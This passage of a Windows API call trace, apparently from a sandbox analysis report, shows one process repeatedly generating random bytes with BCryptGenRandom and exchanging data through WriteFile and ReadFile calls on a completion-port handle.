BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.330] free (_Block=0x3e305b8) [0203.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.331] free (_Block=0x1fa91d0) [0203.331] free (_Block=0x1fa2ed8) [0203.331] free (_Block=0x1fa90b8) [0203.331] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.331] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.340] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x29b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.340] CloseHandle (hObject=0x2a8) returned 1 [0203.340] free (_Block=0x3df0008) [0203.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.347] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.347] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.347] free (_Block=0x3e305b8) [0203.347] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.347] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.347] free (_Block=0x1fa91d0) [0203.347] free (_Block=0x1fa2ed8) [0203.347] free (_Block=0x1fa90b8) [0203.347] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.348] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.356] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.356] CloseHandle (hObject=0x2a8) returned 1 [0203.356] free (_Block=0x3df0008) [0203.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.363] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.363] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.363] free (_Block=0x3e305b8) [0203.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.363] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.363] free (_Block=0x1fa91d0) [0203.363] free (_Block=0x1fa2ed8) [0203.364] free (_Block=0x1fa90b8) [0203.364] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.364] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.373] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.373] CloseHandle (hObject=0x2a8) returned 1 [0203.373] free (_Block=0x3df0008) [0203.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.380] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.380] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.380] free (_Block=0x3e305b8) [0203.380] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.380] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.381] free (_Block=0x1fa91d0) [0203.381] free (_Block=0x1fa2ed8) [0203.381] free (_Block=0x1fa90b8) [0203.381] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.381] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.389] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x111, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.390] CloseHandle (hObject=0x2a8) returned 1 [0203.390] free (_Block=0x3df0008) [0203.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.397] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.397] free (_Block=0x3e305b8) [0203.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.397] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.397] free (_Block=0x1fa91d0) [0203.397] free (_Block=0x1fa2ed8) [0203.397] free (_Block=0x1fa90b8) [0203.397] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.398] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.406] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfb, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.406] CloseHandle (hObject=0x2a8) returned 1 [0203.406] free (_Block=0x3df0008) [0203.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.413] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.413] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.413] free (_Block=0x3e305b8) [0203.413] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.413] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.413] free (_Block=0x1fa91d0) [0203.413] free (_Block=0x1fa2ed8) [0203.413] free (_Block=0x1fa90b8) [0203.413] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.414] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.423] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x103, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.423] CloseHandle (hObject=0x2a8) returned 1 [0203.423] free (_Block=0x3df0008) [0203.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.430] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.430] free (_Block=0x3e305b8) [0203.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.430] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.431] free (_Block=0x1fa91d0) [0203.431] free (_Block=0x1fa2ed8) [0203.431] free (_Block=0x1fa90b8) [0203.431] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.431] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.440] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.441] CloseHandle (hObject=0x2a8) returned 1 [0203.441] free (_Block=0x3df0008) [0203.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.448] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.448] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.448] free (_Block=0x3e305b8) [0203.448] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.448] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.449] free (_Block=0x1fa91d0) [0203.449] free (_Block=0x1fa2ed8) [0203.449] free (_Block=0x1fa90b8) [0203.449] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.449] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.457] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.457] CloseHandle (hObject=0x2a8) returned 1 [0203.457] free (_Block=0x3df0008) [0203.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.464] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.464] free (_Block=0x3e305b8) [0203.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.464] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.464] free (_Block=0x1fa91d0) [0203.464] free (_Block=0x1fa2ed8) [0203.464] free (_Block=0x1fa90b8) [0203.464] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.465] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, 